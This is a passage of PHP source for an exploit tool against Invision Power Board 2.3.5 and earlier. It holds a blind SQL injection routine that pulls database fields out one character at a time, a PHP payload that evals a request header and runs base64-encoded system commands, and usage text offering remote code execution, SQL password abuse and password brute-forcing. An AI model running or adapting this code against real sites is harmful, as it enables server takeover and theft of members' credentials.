            $this-&gt;t_add_1 = &#39;&#39;;
            $this-&gt;t_sel   = &#39;1&#39;;
            $this-&gt;t_bchar = 0;
            $this-&gt;t_join  = &#39;&#39;;
            $this-&gt;t_key   = &#39;&#39;;
            $this-&gt;t_add_1 = &#39;ORDER BY id DESC LIMIT 1&#39;;
            
            return;
    }
    
    function init_global&#40;&#41;
    {
            # Charsets
            $this-&gt;chr_spe = str_split&#40;&#39; :/;*&#40;-.!,?§*µщ&#37;$Ј^Ё=+}&#41;°]аз^_&#92;&#92;&#96;и|[&#92;&#39;{#й~&amp;І&quot;@&#39;&#41;;
            $this-&gt;chr_num = range&#40;0, 9&#41;;
            $this-&gt;chr_md5 = array_merge&#40; $this-&gt;chr_num, range&#40;&#39;a&#39;, &#39;f&#39;&#41; &#41;;
            $this-&gt;chr_ip  = array_merge&#40; $this-&gt;chr_num, array&#40;&#39;.&#39;&#41; &#41;;
            $this-&gt;chr_all = array_merge&#40; $this-&gt;chr_num, range&#40;&#39;a&#39;, &#39;z&#39;&#41; &#41;;
            $this-&gt;chr_all = array_merge&#40; range&#40;&#39;A&#39;, &#39;Z&#39;&#41;, $this-&gt;chr_all, $this-&gt;chr_spe &#41;;

            # SQL Injection
            $this-&gt;def_param = &#39;index.php?s=&amp;act=xmlout&amp;do=check-display-name&amp;name=&#37;rep_inj&#37;&#39;;
            $this-&gt;def_inj   = &quot;&#39; OR 1=&#92;&quot;&#39;&#92;&quot; UNION &#37;rep_req&#37; OR 1=&#92;&quot;&#39;&#92;&quot; &#37;rep_add&#37; #&quot;;
            
            # Results
            $this-&gt;data = array&#40;&#41;;
            $this-&gt;conf = array&#40;&#39;ip&#39; =&gt; &#39;&#39;, &#39;browser&#39; =&gt; &#39;&#39;, &#39;xforward&#39; =&gt; &#39;&#39;&#41;;
            
            # Misc
            $this-&gt;stat     = array&#40;-1 =&gt; &#39;-&#39;, 0 =&gt; &#39;/&#39;, 1 =&gt; &#39;+&#39;&#41;;
            $this-&gt;s_bypass = false;
            $this-&gt;res_sep  = md5&#40;rand&#40;&#41;&#41;;
            $this-&gt;def_ip   = rand&#40;0,255&#41;.&#39;.&#39;.rand&#40;0,255&#41;.&#39;.&#39;.rand&#40;0,255&#41;.&#39;.&#39;.rand&#40;0,255&#41;;
            
            # PHP Code
            $this-&gt;php_write = &#39;${${@eval&#40;$_SERVER[HTTP_MY_CODE]&#41;}}&#39;;
            $this-&gt;php_send  = &quot;print&#40;&#39;$this-&gt;res_sep&#39;&#41;;@system&#40;base64_decode&#40;&#39;&#37;CMD&#37;&#39;&#41;&#41;;&quot;;
            $this-&gt;php_send .= &quot;print&#40;&#39;$this-&gt;res_sep&#39;&#41;;exit&#40;0&#41;;&quot;;
            
            # Regex
            $this-&gt;reg_lang = &#39;#&lt;/span&gt;&lt;/td&gt;[&#92;r&#92;n]*.*[&#92;r&#92;n]*.*code=export&amp;id=&#40;[0-9]+&#41;#i&#39;;
            $this-&gt;reg_lvar = &quot;#id=&#39;XX_&#40;[&#92;w]+&#41;&#39;[&#92;x20]+class=&#39;multitext&#39;&gt;&#40;.*&#41;&lt;/textarea&gt;&lt;/td&gt;#i&quot;;
            $this-&gt;reg_cpre = &#39;#^&#40;.*&#41;session_id$#&#39;;
            # $this-&gt;reg_acp  = &#39;#&lt;a href=&quot;&#40;.*&#41;&quot;[&#92;x20]+target=&quot;_blank&quot;#i&#39;;
            
            # Default client headers
            $this-&gt;s_agent = &#39;Mozilla Firefox&#39;;
            $this-&gt;s_ip    = $this-&gt;def_ip;
            
            return;
    }
    
    function bf_inj&#40;&#41;
    {
            $this-&gt;sub_chr = $this-&gt;t_bchar;
            $this-&gt;key_val = &#39;&#39;;
                    
            if&#40; !empty&#40;$this-&gt;t_key&#41; &#41;
            $this-&gt;msg&#40;&#39;&#39;, 0&#41;;
            
            while&#40; true &#41;
            {
                    if&#40; $this-&gt;t_bchar &lt; 0 &#41;
                    $this-&gt;sub_chr--;
                    
                    else
                    $this-&gt;sub_chr++;
    
                    # 0-9a-f
                    for&#40; $j=0;$j&lt;=count&#40;$this-&gt;t_char&#41;;$j++ &#41;
                    {
                            # That one ?
                            $chr = $this-&gt;t_char[$j];
                            
                            # Latest char ?
                            if&#40; $j === count&#40;$this-&gt;t_char&#41; &#41;
                            $chr = $this-&gt;t_end;
                            
                            # Ascii num
                            $asc = ord&#40;$chr&#41;;
                            
                            # Screen bug
                            if&#40; !empty&#40;$this-&gt;t_key&#41; &#41; 
                            {
                                    $msg  = $this-&gt;t_key.&#39;=&#39;.$this-&gt;key_val;
                                    $msg .= &#40;$chr === $this-&gt;t_end ? &quot;&#92;x20&quot; : $chr&#41;;
                                    
                                    $this-&gt;msg&#40;$msg, 0, 1, 1&#41;;
                            }
                            
                            # Focus on the target ?
                            if&#40; !empty&#40;$this-&gt;t_join&#41; &#41;
                            {
                                    $inj = 
                                    &#39;SELECT 1,&#39;.$this-&gt;t_sel.&#39; FROM &#39;.$this-&gt;p_pre.$this-&gt;t_table.
                                    &#39; t, &#39;.$this-&gt;p_pre.&#39;members m WHERE &#39;.$this-&gt;t_join.
                                    &#39; AND m.&#39;.$this-&gt;t_on.&#39; AND ASCII&#40;SUBSTR&#40;&#39;.$this-&gt;t_field.
                                    &#39;,&#39;.$this-&gt;sub_chr.&#39;,1&#41;&#41;=&#39;.$asc.&#39; &#39;.$this-&gt;t_add_0;
                            }
                            else 
                            {
                                    $inj =
                                    &#39;SELECT 1,&#39;.$this-&gt;t_sel.&#39; FROM &#39;.$this-&gt;p_pre.$this-&gt;t_table.
                                    &#39; t WHERE ASCII&#40;SUBSTR&#40;&#39;.$this-&gt;t_field.&#39;,&#39;.$this-&gt;sub_chr.
                                    &#39;,1&#41;&#41;=&#39;.$asc.&#39; &#39;.$this-&gt;t_add_0;
                            }

                            # SQL Injection via rawurldecode&#40;&#41;
                            $inj = str_replace&#40;&#39;&#37;rep_req&#37;&#39;, $inj, $this-&gt;def_inj&#41;;
                            $inj = str_replace&#40;&#39;&#37;rep_add&#37;&#39;, $this-&gt;t_add_1, $inj&#41;;
                            $inj = str_replace&#40;array&#40;&#39;&quot;&#39;, &quot;&#39;&quot;&#41;, array&#40;&#39;&#37;2522&#39;, &#39;&#37;2527&#39;&#41;, $inj&#41;;
                            
                            # Params
                            $inj = str_replace&#40;&#39;&#37;rep_inj&#37;&#39;, $inj, $this-&gt;def_param&#41;;
                            $inj = str_replace&#40;array&#40;&#39; &#39;, &#39;#&#39;&#41;, array&#40;&#39;&#37;20&#39;, &#39;&#37;23&#39;&#41;, $inj&#41;;
                            
                            $this-&gt;web-&gt;get&#40;$this-&gt;p_url.$inj&#41;;

                            # Ok !?
                            if&#40; !strstr&#40;$this-&gt;web-&gt;getcontent&#40;&#41;, &#39;notfound&#39;&#41; &#41;
                            {
                                    if&#40; $chr !== $this-&gt;t_end &#41;
                                    {       
                                            $this-&gt;key_val .= $chr;
                                            break;
                                    }
                            }
                            
                            # End
                            if&#40; $chr === $this-&gt;t_end &#41;
                            {
                                    # Reverse
                                    if&#40; $this-&gt;t_bchar &lt; 0 &#41;
                                    $this-&gt;key_val = strrev&#40;$this-&gt;key_val&#41;;
                                    
                                    if&#40; !empty&#40;$this-&gt;t_key&#41; &#41; 
                                    $this-&gt;msg&#40;$this-&gt;t_key.&#39;=&#39;.$this-&gt;key_val, 1, 1, 1&#41;;

                                    return $this-&gt;key_val;
                            }
                    }
            }
            
    }
            
    function get_p&#40;$p, $exit=false&#41;
    {
            global $argv;
            
            foreach&#40; $argv as $key =&gt; $value &#41;
            {
                    if&#40; $value === &#39;-&#39;.$p &#41;
                    {
                            if&#40; isset&#40;$argv[$key+1]&#41; &amp;&amp; !empty&#40;$argv[$key+1]&#41; &#41;
                            {                                       
                                    return $argv[$key+1];
                            }
                            else
                            {
                                    if&#40; $exit &#41;
                                    $this-&gt;usage&#40;&#41;;
                                    
                                    return true;
                            }
                    }
            }
            
            if&#40; $exit &#41;
            $this-&gt;usage&#40;&#41;;
            
            return false;
    }
    
    function msg&#40;$msg, $nstatus, $nspace=1, $ndel=0, $ask=false&#41;
    {
            if&#40; $ndel &#41; $type = &quot;&#92;r&quot;;
            else        $type = &quot;&#92;n&quot;;
            
            # wtf &#40;:
            print
            &#40;
                    $type.str_repeat&#40;&quot;&#92;x20&quot;, $nspace&#41;.
                    $this-&gt;stat[$nstatus].&quot;&#92;x20&quot;.$msg
            &#41;;
            
            if&#40; $ask &#41;
            return trim&#40;fgets&#40;STDIN&#41;&#41;;
    }
    
    function give_hope&#40;&#41;
    {                               
            $this-&gt;msg&#40;&#39;You should try with another user or try another time&#39;, -1&#41;;
                    
            exit&#40;1&#41;;
    }
    
    function mhead&#40;&#41;
    {
            # Advisory: http://acid-root.new.fr/?0:18
            
            print &quot;&#92;n Invision Power Board &lt;= 2.3.5 Multiple Vulnerabilities&quot;;
            print &quot;&#92;n ------------------------------------------------------&quot;;
            print &quot;&#92;n&#92;n About:&quot;;
            print &quot;&#92;n&#92;n by DarkFig &lt; gmdarkfig &#40;at&#41; gmail &#40;dot&#41; com &gt;&quot;;
            print &quot;&#92;n http://acid-root.new.fr/&quot;;
            print &quot;&#92;n #[email protected]&quot;;
            print &quot;&#92;n&#92;n&#92;n Attack&#40;s&#41;:&#92;n&quot;;
            
            return;
    }
    
    function usage&#40;&#41;
    {

            print &quot;&#92;n -attack &lt;int_choice&gt; &lt;params&gt; [options]&#92;n&#92;n&quot;;
            print &quot;  1 - PHP code execution&#92;n&#92;n&quot;;
            print &quot;    -url        IPB url with ending slash&#92;n&#92;n&quot;;
            print &quot;    -uname      targeted username&#92;n&quot;;
            print &quot;    -uid        OR the targeted user id &#40;def: 1&#41;&#92;n&#92;n&quot;;
            print &quot;    -prefix     sql table prefix &#40;def: ibf_&#41;&#92;n&quot;;
            print &quot;    -acp        admin control panel path &#40;def: admin&#41;&#92;n&#92;n&#92;n&quot;;
            print &quot;  2 - Insecure SQL password usage&#92;n&#92;n&quot;;
            print &quot;    -ip         your current IP&#92;n&quot;;
            print &quot;    -dict       a wordlist file&#92;n&#92;n&quot;;
            print &quot;    -url        IPB url with ending slash&#92;n&quot;;
            print &quot;    -uname      a valid member username&#92;n&quot;;
            print &quot;    -pwd        the associated password&#92;n&#92;n&quot;;
            print &quot;    -uid        OR  the targeted member id&#92;n&quot;;
            print &quot;    -passhash   the passhash cookie value&#92;n&quot;;
            print &quot;    -stronghold the stronghold cookie value&#92;n&#92;n&quot;;
            print &quot;    -sqlusr     you can precise the sql user&#92;n&quot;;
            print &quot;    -prefix     sql table prefix &#40;def: ibf_&#41;&#92;n&#92;n&#92;n&quot;;
            print &quot;  3 - Password bruteforcer&#92;n&#92;n&quot;;
            print &quot;    -dict       a wordlist file&#92;n&#92;n&quot;;
            print &quot;    -url        IPB url with ending slash&#92;n&quot;;
            print &quot;    -uname      targeted username&#92;n&quot;;
            print &quot;    -uid        OR  the targeted user id &#40;def: 1&#41;&#92;n&quot;;
            print &quot;    -prefix     sql table prefix &#40;def: ibf_&#41;&#92;n&#92;n&quot;;
            print &quot;    -passhash   OR the passhash value&#92;n&quot;;
            print &quot;    -salt       the salt value&#92;n&#92;n&#92;n&quot;;
            print &quot;  Optional: &#92;n&#92;n&quot;;
            print &quot;    -proxhost &lt;ip&gt;       if you wanna use a proxy&#92;n&quot;;
            print &quot;    -proxauth &lt;usr:pwd&gt;  proxy with authentication&#92;n&quot;;
            
            exit&#40;1&#41;;
    }

}

$web = new phpsploit;
$web->cookiejar(1);
$web->agent('Mozilla Firefox');

$ipb = new ipb_spl;
$ipb->web =& $web;
$ipb->main();

?>